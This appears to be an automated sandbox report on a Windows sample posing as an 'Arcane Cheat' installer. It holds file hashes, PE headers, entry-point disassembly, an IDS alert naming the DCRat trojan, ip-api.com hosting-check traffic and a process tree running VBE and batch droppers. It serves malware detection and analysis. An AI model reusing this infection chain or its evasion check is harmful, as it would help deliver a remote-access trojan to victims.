                                SHA-256:DA0500DB781CE974A0C4D9B6F245D2302F90DC932D23402D1441E3D5C77C6CD4
                                SHA-512:057B00AA42A3B2DA1DFAA646AA6BD0C8D9CDD3F34848F595B56AED2BF02F5D89092A7B2722BB24D3F860619FB305C994546EC6D43C6DA1EF2FA82ACC6CD5A643
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'...Rich&...................PE..L....._.....................6......@........0....@.......................................@......................... ...4...T...<....0...W......................h"......T............................U..@............0..`...... ....................text............................... ..`.rdata.......0......................@..@.data...(7..........................@....didat....... ......................@....rsrc....W...0...X..................@..@.reloc..h".......$...(..............@..B........................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\uChcvn3L6R.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):46950613
                                Entropy (8bit):7.999892667043701
                                Encrypted:true
                                SSDEEP:786432:CNu/WmUoEqtPbDiTr+LykgDYGUvqptKaQ393283Ka3rPJHE2NOAshK:DUoEqtfiTAIldpt435x3rjs4
                                MD5:81E98D594505E0008D35FF1E1D2E4E41
                                SHA1:D1852F516C8FFB87CA8A7E8146EAFCD8D8A57369
                                SHA-256:152DBB49FB78F6DAA7FF14B44EA558E5164041CD7FE8A372E41A6D9F0D382512
                                SHA-512:F9E4A531D5BA36D9924F0FA230BDA219E17BACADC0C6A0E9A4F0CC96F96FF92A775CF33A5FD81291165FA36C0031D16EFBDF8BB4C499E20EBBCD30E60E515930
                                Malicious:false
                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......U..................................... ....@..............................................@...................................................................................................................................................text...4........................... ..`.itext..D........................... ..`.data........ ......................@....bss.....V...0...........................idata..............................@....tls.....................................rdata..............................@..@.rsrc................ ..............@..@....................................@..@........................................................................................................................................
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                Category:dropped
                                Size (bytes):6144
                                Entropy (8bit):4.720366600008286
                                Encrypted:false
                                SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                Category:dropped
                                Size (bytes):23312
                                Entropy (8bit):4.596242908851566
                                Encrypted:false
                                SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\AppData\Local\Temp\Arcane CheatSetup.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):1175040
                                Entropy (8bit):6.397948456227505
                                Encrypted:false
                                SSDEEP:24576:WEZXjiinrzY5tO+uKE3LMT0jECZQEbLBDBEnFWsyb7xyx:bdmbjTKlD00R
                                MD5:129B8E200A6E90E813080C9CE0474063
                                SHA1:B5352CDAE50E5DDF3EB62F75F2E77042386B8841
                                SHA-256:CF0018AFFDD0B7921F922F1741AD229EC52C8A7D6C2B19889A149E0CC24AA839
                                SHA-512:10949E7F0B6DD55E0A5D97E4531EF61427920CCCC2136C0DD3607CDC79AFA0D8A7178965A07039948DA97F0200EAD8FE5A54921620C943C7FC76DD5EF5A7C841
                                Malicious:true
                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......U..........................................@..............................................@..............................,8... ..............................................................................|................................text...$........................... ..`.itext.. ........................... ..`.data...<0.......2..................@....bss.....a...P...........................idata..,8.......:..................@....tls....<............X...................rdata...............X..............@..@.rsrc........ .......Z..............@..@....................................@..@........................................................................................................................................
                                Process:C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                File Type:ASCII text, with very long lines (463), with no line terminators
                                Category:dropped
                                Size (bytes):463
                                Entropy (8bit):5.866410671392798
                                Encrypted:false
                                SSDEEP:12:qVbxPd5JfUKpJRSCrXwMA4Tkx+VsK9UD3aoYp0Qf03x/aQBXh:wj5Jfh7zDwMA09VsK8qdeM03UQBx
                                MD5:B07E3EE93C8BBE7A55F377829BD43F13
                                SHA1:9C7142B8F33019DA44C2454D6AAC2EA5DF7BD600
                                SHA-256:E8E1788B1BD589F52F24310DEA095232C4BE097293ADBDDC6F546BE2CC43D67D
                                SHA-512:391C60F7036C685D8C75992170EABEDE99715E759D187BA6A78B312486331BA6F1B01FF44E23BC275B5969FDE98705BA93448DDEDA07C4835D0AFE6BD8352A5F
                                Malicious:false
                                Preview:Rhhvv1VmMqu25WhqBV5brZZiHQ3KlHoVI1xUkmwDsnHhR2KIi9yfVSv1I9ne7KBFBZtDiNGYi2tDS2QPGvmlSJA0F5Mk9RFhmBf2JGjV3Z6cjrjPtYYMhZw2Z38nAfZRwLbQWYFALRs2MhQYV61k339NOndPI6UYApqYQT2USYAQr4p1mjREozY3LNBt501P7U2h12HCDgRe2tgU7lmioPtKQxMCSIZcgvTWBHAucPAHh3AbrqwTNTkrksQEpEt4Hy7HaJT0k2GZOmmXwuUlWFPNLmwT06EXfF9s52BiX6sVNKc7F3R4uIiBju6xW99oxs3Im4c4twNaX3AAJzO7pJnWh8JL6NMY6EheQTULbWL75Inpt5ohvC8oEhlouQ7fjydTWft0eDfS7paZUdbBjpm4F2atrqaKZqYGpUSNLxCsgqqYGMTRy654MiNdFAIxmV3RRTt9KOzwm4Y
                                Process:C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):1489408
                                Entropy (8bit):7.193053435886149
                                Encrypted:false
                                SSDEEP:24576:qKXTRDwHzIPaJh8ux5LPP0ygQ9lykn4uNXXpDrmbVm+G:TXexpx5LkzQ9lT1NJDruT
                                MD5:E780BB029D808CB41937F4F7CD022B45
                                SHA1:AD1A7BC098D991E576CF59AA87D844E2991DA43A
                                SHA-256:772574576B825F97AA91CE0D24B0BA83FDB0DE3A0545296E1D6D28F1349F1456
                                SHA-512:0152DF85A9EBE44F750BFBB53735400CB08B406DCDE80C2FBA7627D00533B485AE1B3CB419F9C895F22B05582FB25E0AE2F6B12E9AFB78F721C75FE019E6DDA5
                                Malicious:true
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. ....................... ............@.....................................K.................................................................................... ............... ..H............text...4~... ...................... ..`.sdata.../.......0..................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                File Type:ASCII text, with very long lines (386), with no line terminators
                                Category:dropped
                                Size (bytes):386
                                Entropy (8bit):5.84628637676446
                                Encrypted:false
                                SSDEEP:12:5P79wiL6xv4hWxZjjj2NW9CZ83WD9oPz7:Z76yGjj2gA8GD9oP3
                                MD5:842B0A1A2DEDBF6C5B14553F22BB9884
                                SHA1:8934AA1F79E39CA016150363BDB0DC4999AAA7C4
                                SHA-256:3D4443FD7A9C565CB1FCAAC80F407A8B49545828A69997FE465D25E7015CC49A
                                SHA-512:D7822FCF930167C07B260E1DDF43DA40DFF43336D89CD86C6534421478B8A4616D2225DB0442CBECAB5E3DBCDE3E8C422512F8F3C5BBB3D0E71C518A86C4E48D
                                Malicious:false
                                Preview:OupjXQXJvAmS5bl7Okg8zHkTiwHgxgSeRcOnrnVsBXwN6brsnntTegiHKVBlI0VOrIAdN8QkPx7cVWXGEZ2Kx99v4HdVmujKBhfyaOepWJEqiGvx84hs8LbrIPjFf58fOwax1jqz5Nxn5TMxWqXrN0MzGxqLpZJbKjcwp85YOrxuYxwyCvtzhRRXkkqD2fKfDVdW1aIYu8dfCbbTB1I4pU43REMER2gshRrCUa7mmVEixwUIJXCBWP0sbjFwNEH1cu8vuZ8k4fRUPVGeuD530eWRb8luVKYiOMFCyjYtYbG17gcFdkCKINB7YqTwyOPuGtFDQDqLpLeYYfU5ffQuIOZAKHoIPl5KLWuOaZza31e7tnj2WYQS7fm2TE2IYi5DQU
                                Process:C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):1489408
                                Entropy (8bit):7.193053435886149
                                Encrypted:false
                                SSDEEP:24576:qKXTRDwHzIPaJh8ux5LPP0ygQ9lykn4uNXXpDrmbVm+G:TXexpx5LkzQ9lT1NJDruT
                                MD5:E780BB029D808CB41937F4F7CD022B45
                                SHA1:AD1A7BC098D991E576CF59AA87D844E2991DA43A
                                SHA-256:772574576B825F97AA91CE0D24B0BA83FDB0DE3A0545296E1D6D28F1349F1456
                                SHA-512:0152DF85A9EBE44F750BFBB53735400CB08B406DCDE80C2FBA7627D00533B485AE1B3CB419F9C895F22B05582FB25E0AE2F6B12E9AFB78F721C75FE019E6DDA5
                                Malicious:true
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. ....................... ............@.....................................K.................................................................................... ............... ..H............text...4~... ...................... ..`.sdata.../.......0..................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                File Type:ASCII text, with very long lines (401), with no line terminators
                                Category:dropped
                                Size (bytes):401
                                Entropy (8bit):5.8377022771564056
                                Encrypted:false
                                SSDEEP:12:SMUf3NtAdM4iojEI23HdanwuQ/avwQpBzkdtE:RI3NWu4ioD234vQynpv
                                MD5:20985845A5DC826CE82007A959978A8D
                                SHA1:1C7A0DAA785B7FB8319B49D2EBA828858ED9C69E
                                SHA-256:CDED0FEBB35688EE1223907088ABC118C6FAAB849D979FE7619538EF1B1447FA
                                SHA-512:C4D2F511F0746082E718A594F06A52322088678AEC775382EBAF3D6188A5D28DB754A74A6173EFD186B1F097FBB9D8828B15A6742E24A7DB7515DB520EA5C59F
                                Malicious:false
                                Preview:WdPNASXSioI5GlbTAkABDtFxmulxUmaxH3QmVIEUPoYWWp34qDzyP3VmXblPrj76OVyNVy82gpwYUsb61qHRxlhNioP3gympqcIA1qj1E6RkH6Sp9pYAcqImxkoqjFWsCGr1jaFLHQM0U7GmWj31ZmNATgNQB2R9kjhAOaFjjN3LdRSzeCU9LeSa3rhDNzJO8NQuaFX5eURMtBhCOXv9hRxFQGGh2BWuDoNPBhZYoZf1NFr2JfzzDKrqaKeT80Dd8hJEySAq8XUIw62KZOYWLhq26gy0CFZyVB3p6mD0fI0q0i3eST4ucrRb1QHRdKn27gwvCNNwKh1Cq9CYmUhtLpVoubxqewWVf7tTvIbFFHj4zOu1NtoJm4rRKIAkZhRYKfhtQtmd3coDGbyfr
                                Process:C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):1489408
                                Entropy (8bit):7.193053435886149
                                Encrypted:false
                                SSDEEP:24576:qKXTRDwHzIPaJh8ux5LPP0ygQ9lykn4uNXXpDrmbVm+G:TXexpx5LkzQ9lT1NJDruT
                                MD5:E780BB029D808CB41937F4F7CD022B45
                                SHA1:AD1A7BC098D991E576CF59AA87D844E2991DA43A
                                SHA-256:772574576B825F97AA91CE0D24B0BA83FDB0DE3A0545296E1D6D28F1349F1456
                                SHA-512:0152DF85A9EBE44F750BFBB53735400CB08B406DCDE80C2FBA7627D00533B485AE1B3CB419F9C895F22B05582FB25E0AE2F6B12E9AFB78F721C75FE019E6DDA5
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. ....................... ............@.....................................K.................................................................................... ............... ..H............text...4~... ...................... ..`.sdata.../.......0..................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.9946318426841465
                                TrID:
                                • Win32 Executable (generic) Net Framework (10011505/4) 49.91%
                                • Win32 Executable (generic) a (10002005/4) 49.86%
                                • InstallShield setup (43055/19) 0.21%
                                • Generic Win/DOS Executable (2004/3) 0.01%
                                • DOS Executable Generic (2002/1) 0.01%
                                File name:uChcvn3L6R.exe
                                File size:48'732'160 bytes
                                MD5:236b78f3cd3a0b771d318f044dda8f45
                                SHA1:f890ca2ffb6218fa01df6844fe2a51b184e912b8
                                SHA256:8342c29aacd500b5d424822648331736379f18bdb6bc27a7e7a579544570fa8a
                                SHA512:8c6f2131f7566d64a5a8973cf4a3bad7d733e02d098326f30ec4f88785237c26d7361acfc674de084997356d2bb082ea8ec14b7ac4485fa63102b40c2dcb3d1e
                                SSDEEP:786432:uNu/WmUoEqtPbDiTr+LykgDYGUvqptKaQ393283Ka3rPJHE2NOAsh8bOC:vUoEqtfiTAIldpt435x3rjs2qC
                                TLSH:43B733027E418961F41A0933C2FF99144B71A8A12BE5F3177EFAB7AD55223932C2D6C7
                                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                Icon Hash:90cececece8e8eb0
                                Entrypoint:0x4020cc
                                Entrypoint Section:CODE
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                DLL Characteristics:
                                Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:d59a4a699610169663a929d37c90be43
                                Instruction
                                push ebp
                                mov ebp, esp
                                mov ecx, 0000000Ch
                                push 00000000h
                                push 00000000h
                                dec ecx
                                jne 00007F76F4F996ABh
                                push ecx
                                push ebx
                                push esi
                                push edi
                                mov eax, 0040209Ch
                                call 00007F76F4F99120h
                                xor eax, eax
                                push ebp
                                push 00402361h
                                push dword ptr fs:[eax]
                                mov dword ptr fs:[eax], esp
                                lea edx, dword ptr [ebp-14h]
                                mov eax, 00402378h
                                call 00007F76F4F994F9h
                                mov eax, dword ptr [ebp-14h]
                                call 00007F76F4F995C9h
                                mov edi, eax
                                test edi, edi
                                jng 00007F76F4F998E6h
                                mov ebx, 00000001h
                                lea edx, dword ptr [ebp-20h]
                                mov eax, ebx
                                call 00007F76F4F99588h
                                mov ecx, dword ptr [ebp-20h]
                                lea eax, dword ptr [ebp-1Ch]
                                mov edx, 00402384h
                                call 00007F76F4F98D18h
                                mov eax, dword ptr [ebp-1Ch]
                                lea edx, dword ptr [ebp-18h]
                                call 00007F76F4F994BDh
                                mov edx, dword ptr [ebp-18h]
                                mov eax, 00404680h
                                call 00007F76F4F98BF0h
                                lea edx, dword ptr [ebp-2Ch]
                                mov eax, ebx
                                call 00007F76F4F99556h
                                mov ecx, dword ptr [ebp-2Ch]
                                lea eax, dword ptr [ebp-28h]
                                mov edx, 00402390h
                                call 00007F76F4F98CE6h
                                mov eax, dword ptr [ebp-28h]
                                lea edx, dword ptr [ebp-24h]
                                call 00007F76F4F9948Bh
                                mov edx, dword ptr [ebp-24h]
                                mov eax, 00404684h
                                call 00007F76F4F98BBEh
                                lea edx, dword ptr [ebp-38h]
                                mov eax, ebx
                                call 00007F76F4F99524h
                                mov ecx, dword ptr [ebp-38h]
                                lea eax, dword ptr [ebp-34h]
                                mov edx, 0040239Ch
                                Name                                  Virtual Address  Virtual Size  Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT          0x5000           0x302         .idata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE        0x9000           0x2e774ac     .rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC       0x8000           0x1c8         .reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                IMAGE_DIRECTORY_ENTRY_TLS             0x7000           0x18          .rdata
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                CODE0x10000x13b80x1400e5913936857bed3b3b2fbac53e973471False0.6318359375data6.340990548290613IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                DATA0x30000x7c0x200cef89de607e490725490a3cd679af6bbFalse0.162109375Matlab v4 mat-file (little endian) , numeric, rows 0, columns 42304001.1176271682252383IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                BSS0x40000x6950x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .idata0x50000x3020x4003d2f2fc4e279cba623217ec9de264c4fFalse0.3876953125data3.47731642923935IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .tls0x60000x40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rdata0x70000x180x200467f29e48f3451df774e13adae5aafc2False0.05078125data0.1991075177871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                .reloc0x80000x1c80x2009859d413c7408cb699cca05d648c2502False0.876953125data5.7832974211095225IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                .rsrc0x90000x2e774ac0x2e776000a451b2d8dc756603d439b9513bc7be8unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                Name       RVA        Size       Type                                               Language  Country  ZLIB Complexity
                                RT_RCDATA  0x9294     0x2cc68d5  PE32 executable (GUI) Intel 80386, for MS Windows                     0.9314765930175781
                                RT_RCDATA  0x2ccfb6c  0x1b08ba   PE32 executable (GUI) Intel 80386, for MS Windows                     0.4997720718383789
                                RT_RCDATA  0x2e80428  0x15       ASCII text, with no line terminators                                  1.380952380952381
                                RT_RCDATA  0x2e80440  0x10       ASCII text, with no line terminators                                  1.5
                                RT_RCDATA  0x2e80450  0x1        very short file (no magic)                                            9.0
                                RT_RCDATA  0x2e80454  0x1        very short file (no magic)                                            9.0
                                RT_RCDATA  0x2e80458  0x1        very short file (no magic)                                            9.0
                                RT_RCDATA  0x2e8045c  0x1        very short file (no magic)                                            9.0
                                RT_RCDATA  0x2e80460  0x10       data                                                                  1.5
                                RT_RCDATA  0x2e80470  0x1        very short file (no magic)                                            9.0
                                RT_RCDATA  0x2e80474  0x38       data                                                                  1.0714285714285714
                                DLL           Import
                                kernel32.dll  GetCurrentThreadId, SetCurrentDirectoryA, GetCurrentDirectoryA, ExitProcess, RtlUnwind, RaiseException, TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA, FreeLibrary, HeapFree, HeapReAlloc, HeapAlloc, GetProcessHeap
                                kernel32.dll  WriteFile, SizeofResource, SetFilePointer, LockResource, LoadResource, GetWindowsDirectoryA, GetTempPathA, GetSystemDirectoryA, FreeResource, FindResourceA, CreateFileA, CloseHandle
                                shfolder.dll  SHGetFolderPathA
                                shell32.dll   ShellExecuteA
                                Timestamp                 Protocol  SID      Message                                                Source Port  Dest Port  Source IP      Dest IP
                                05/26/24-10:04:29.664888  TCP       2850862  ETPRO TROJAN DCRat Initial Checkin Server Response M4  80           49738      104.21.22.205  192.168.2.4
                                Timestamp                             Source Port  Dest Port  Source IP    Dest IP
                                May 26, 2024 10:02:11.367506981 CEST  53609        53         192.168.2.4  1.1.1.1
                                May 26, 2024 10:02:11.383781910 CEST  53           53609      1.1.1.1      192.168.2.4
                                Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name        Type            Class        DNS over HTTPS
                                May 26, 2024 10:02:11.367506981 CEST  192.168.2.4  1.1.1.1  0x2907    Standard query (0)  ip-api.com  A (IP address)  IN (0x0001)  false
                                Timestamp                             Source IP  Dest IP      Trans ID  Reply Code    Name        CName  Address       Type            Class        DNS over HTTPS
                                May 26, 2024 10:02:11.383781910 CEST  1.1.1.1    192.168.2.4  0x2907    No error (0)  ip-api.com         208.95.112.1  A (IP address)  IN (0x0001)  false
                                • ip-api.com
                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                0           192.168.2.4  49730        208.95.112.1    80                6456  C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                Timestamp                             Bytes transferred  Direction  Data
                                May 26, 2024 10:02:11.402102947 CEST  80                 OUT        GET /line/?fields=hosting HTTP/1.1
                                Host: ip-api.com
                                Connection: Keep-Alive
                                May 26, 2024 10:02:11.880366087 CEST  175                IN         HTTP/1.1 200 OK
                                Date: Sun, 26 May 2024 08:02:11 GMT
                                Content-Type: text/plain; charset=utf-8
                                Content-Length: 6
                                Access-Control-Allow-Origin: *
                                X-Ttl: 60
                                X-Rl: 44
                                Data Raw: 66 61 6c 73 65 0a
                                Data Ascii: false


                                Session ID  Source IP    Source Port  Destination IP  Destination Port
                                1           192.168.2.4  49731        208.95.112.1    80
                                Timestamp                             Bytes transferred  Direction  Data
                                May 26, 2024 10:02:19.207380056 CEST  80                 OUT        GET /line/?fields=hosting HTTP/1.1
                                Host: ip-api.com
                                Connection: Keep-Alive
                                May 26, 2024 10:02:19.691047907 CEST  175                IN         HTTP/1.1 200 OK
                                Date: Sun, 26 May 2024 08:02:18 GMT
                                Content-Type: text/plain; charset=utf-8
                                Content-Length: 6
                                Access-Control-Allow-Origin: *
                                X-Ttl: 52
                                X-Rl: 43
                                Data Raw: 66 61 6c 73 65 0a
                                Data Ascii: false


                                Target ID:0
                                Start time:04:01:59
                                Start date:26/05/2024
                                Path:C:\Users\user\Desktop\uChcvn3L6R.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\uChcvn3L6R.exe"
                                Imagebase:0x400000
                                File size:48'732'160 bytes
                                MD5 hash:236B78F3CD3A0B771D318F044DDA8F45
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                Target ID:1
                                Start time:04:02:04
                                Start date:26/05/2024
                                Path:C:\Users\user\AppData\Local\Temp\Arcane CheatSetup.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Local\Temp\Arcane CheatSetup.exe"
                                Imagebase:0x400000
                                File size:46'950'613 bytes
                                MD5 hash:81E98D594505E0008D35FF1E1D2E4E41
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:Borland Delphi
                                Reputation:low
                                Has exited:true

                                Target ID:2
                                Start time:04:02:05
                                Start date:26/05/2024
                                Path:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp" /SL5="$4042E,46527891,119296,C:\Users\user\AppData\Local\Temp\Arcane CheatSetup.exe"
                                Imagebase:0x400000
                                File size:1'175'040 bytes
                                MD5 hash:129B8E200A6E90E813080C9CE0474063
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:Borland Delphi
                                Reputation:moderate
                                Has exited:true

                                Target ID:3
                                Start time:04:02:06
                                Start date:26/05/2024
                                Path:C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe"
                                Imagebase:0x820000
                                File size:1'771'706 bytes
                                MD5 hash:593631A643AA6AB0AF08189773812E6D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                Target ID:4
                                Start time:04:02:06
                                Start date:26/05/2024
                                Path:C:\Windows\SysWOW64\wscript.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Surrogateprovidercomponentsessionmonitor\lEI1Ux7.vbe"
                                Imagebase:0x170000
                                File size:147'456 bytes
                                MD5 hash:FF00E0480075B095948000BDC66E81F0
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                Target ID:5
                                Start time:04:02:08
                                Start date:26/05/2024
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Surrogateprovidercomponentsessionmonitor\bjWdhUfYhC7CKzpdCHePv6eJ.bat" "
                                Imagebase:0x240000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:6
                                Start time:04:02:08
                                Start date:26/05/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:7
                                Start time:04:02:08
                                Start date:26/05/2024
                                Path:C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe"
                                Imagebase:0x570000
                                File size:1'489'408 bytes
                                MD5 hash:E780BB029D808CB41937F4F7CD022B45
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
